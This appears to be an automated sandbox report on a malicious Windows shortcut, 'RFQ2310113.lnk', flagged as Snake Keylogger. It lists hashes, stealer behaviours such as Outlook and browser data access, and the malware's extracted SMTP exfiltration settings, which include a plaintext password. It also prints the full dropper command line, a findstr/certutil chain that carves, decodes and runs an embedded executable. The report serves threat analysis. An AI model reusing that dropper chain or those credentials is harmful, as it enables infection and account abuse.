Analysis
-
max time kernel
120s -
max time network
151s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
12-10-2023 06:57
Static task
static1
Behavioral task
behavioral1
Sample
RFQ2310113.lnk
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
RFQ2310113.lnk
Resource
win10v2004-20230915-en
General
-
Target
RFQ2310113.lnk
-
Size
189KB
-
MD5
b63351d03fd881836a5ac5e41a9dcfd3
-
SHA1
ef1527ae584e66a30f6445ef7aa24fb0a224ee38
-
SHA256
32540260cd472fad0798b97d44b8487c1bb9f18f7b68cfd3b2a01c457372fd4f
-
SHA512
df063d7698db772421d3ed92f543cf96e34f171eb32b1efcb15572c639d670aad08e2178297f8c660eb4cba619bfeb21a4a0302f7cb9ca472668d83be1e5e6fc
-
SSDEEP
3072:dKYPSEKR8itPqPiGjuyLAfOjRBM/JgQMHMJJP7TWRhby:XP/KR8SZggG/SJgdOJP7TWRh+
Malware Config
Extracted
Protocol: smtp- Host:
mail.avtorska.com.mk - Port:
587 - Username:
[email protected] - Password:
avtorska2014@
Extracted
snakekeylogger
Protocol: smtp- Host:
mail.avtorska.com.mk - Port:
587 - Username:
[email protected] - Password:
avtorska2014@ - Email To:
[email protected]
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 4 IoCs
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk family_snakekeylogger C:\Users\Admin\AppData\Local\Temp\82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk family_snakekeylogger C:\Users\Admin\AppData\Local\Temp\82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk family_snakekeylogger behavioral1/memory/2640-43-0x000000013FEC0000-0x000000013FEE6000-memory.dmp family_snakekeylogger -
Executes dropped EXE 1 IoCs
Processes:
82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnkpid process 2640 82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk -
Loads dropped DLL 1 IoCs
Processes:
cmd.exepid process 2328 cmd.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnkdescription ioc process Key opened \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk Key opened \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk Key opened \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 4 checkip.dyndns.org -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnkpid process 2640 82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk 2640 82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnkdescription pid process Token: SeDebugPrivilege 2640 82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
cmd.execmd.exedescription pid process target process PID 1872 wrote to memory of 2328 1872 cmd.exe cmd.exe PID 1872 wrote to memory of 2328 1872 cmd.exe cmd.exe PID 1872 wrote to memory of 2328 1872 cmd.exe cmd.exe PID 2328 wrote to memory of 2592 2328 cmd.exe findstr.exe PID 2328 wrote to memory of 2592 2328 cmd.exe findstr.exe PID 2328 wrote to memory of 2592 2328 cmd.exe findstr.exe PID 2328 wrote to memory of 2708 2328 cmd.exe certutil.exe PID 2328 wrote to memory of 2708 2328 cmd.exe certutil.exe PID 2328 wrote to memory of 2708 2328 cmd.exe certutil.exe PID 2328 wrote to memory of 2640 2328 cmd.exe 82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk PID 2328 wrote to memory of 2640 2328 cmd.exe 82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk PID 2328 wrote to memory of 2640 2328 cmd.exe 82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk -
outlook_office_path 1 IoCs
Processes:
82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnkdescription ioc process Key opened \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk -
outlook_win_path 1 IoCs
Processes:
82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnkdescription ioc process Key opened \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\RFQ2310113.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:1872 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k "0BuHTtq7wyB1e3BR7VXBN1JkltCcyzcwj2TbqvGICjdRaiKsYpN3v2eOjdUTzBa44CdlUa8Dk8nd6UzvdBO78TnEaTdWGJec6mhskAtO8dN436zlURDoitxKJRTseR89a3r1HGeeeuoJAAchkhrhHGJyCinsRMHeywDbsaAhIuV8akh6A3hRliUnZQvl1fouGSZQuASgVQ1lphfxvsexc9UWyYbtJjzlw9Mc8wYgvgJmW74AXJMP6I6Cio & findstr "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAA" RFQ2310113.lnk>C:\Users\Admin\AppData\Local\Temp\82be4ea8-5d23-429c-93f2-fcf0f8777efd.tmp & certutil -decode C:\Users\Admin\AppData\Local\Temp\82be4ea8-5d23-429c-93f2-fcf0f8777efd.tmp C:\Users\Admin\AppData\Local\Temp\82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk & start C:\Users\Admin\AppData\Local\Temp\82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk & del C:\Users\Admin\AppData\Local\Temp\82be4ea8-5d23-429c-93f2-fcf0f8777efd.tmp & exit & 0BuHTtq7wyB1e3BR7VXBN1JkltCcyzcwj2TbqvGICjdRaiKsYpN3v2eOjdUTzBa44CdlUa8Dk8nd6UzvdBO78TnEaTdWGJec6mhskAtO8dN436zlURDoitxKJRTseR89a3r1HGeeeuoJAAchkhrhHGJyCinsRMHeywDbsaAhIuV8akh6A3hRliUnZQvl1fouGSZQuASgVQ1lphfxvsexc9UWyYbtJjzlw9Mc8wYgvgJmW74AXJMP6I6Cio"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2328 -
C:\Windows\system32\findstr.exefindstr "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAA" RFQ2310113.lnk3⤵PID:2592
-
C:\Windows\system32\certutil.execertutil -decode C:\Users\Admin\AppData\Local\Temp\82be4ea8-5d23-429c-93f2-fcf0f8777efd.tmp C:\Users\Admin\AppData\Local\Temp\82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk3⤵PID:2708
-
C:\Users\Admin\AppData\Local\Temp\82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnkC:\Users\Admin\AppData\Local\Temp\82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk3⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2640
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
139KB
MD54125ea2fb2e0729c7feee51c859ada21
SHA121e47553ff803b30c7fdc7be618a7443e37297bb
SHA25632a063afcf2fba7e086632f90a32280448ad07c105d340cd44b079466ccb661d
SHA51237bb2ab066b482931ca81c29ee116825d2a8786ef319ee658e883338a36ab612c8bebf34f5b1fae46797bf72fdfe6a26eed238015a225d7b2423c6190c81650d
-
Filesize
139KB
MD54125ea2fb2e0729c7feee51c859ada21
SHA121e47553ff803b30c7fdc7be618a7443e37297bb
SHA25632a063afcf2fba7e086632f90a32280448ad07c105d340cd44b079466ccb661d
SHA51237bb2ab066b482931ca81c29ee116825d2a8786ef319ee658e883338a36ab612c8bebf34f5b1fae46797bf72fdfe6a26eed238015a225d7b2423c6190c81650d
-
Filesize
186KB
MD58a33bf953de2c0fbba1c4d84912ef6a2
SHA14c97c27f7e33f03f4e62f80eeb1a9f632b78b77c
SHA256f77c8b20606c1deac4ecfb4dbaa266d0909d9ea87912b0beeb99fc0766b3607f
SHA51241ecfc158423f7b6441c2f0f7a9703b7e6990f724c569ca0edd7f4aa4d812e641dd8b4841c1b9b9d7e91ae7dcdbfa0cdc1878f26d0b6baa3af3dc46d03d651f1
-
Filesize
139KB
MD54125ea2fb2e0729c7feee51c859ada21
SHA121e47553ff803b30c7fdc7be618a7443e37297bb
SHA25632a063afcf2fba7e086632f90a32280448ad07c105d340cd44b079466ccb661d
SHA51237bb2ab066b482931ca81c29ee116825d2a8786ef319ee658e883338a36ab612c8bebf34f5b1fae46797bf72fdfe6a26eed238015a225d7b2423c6190c81650d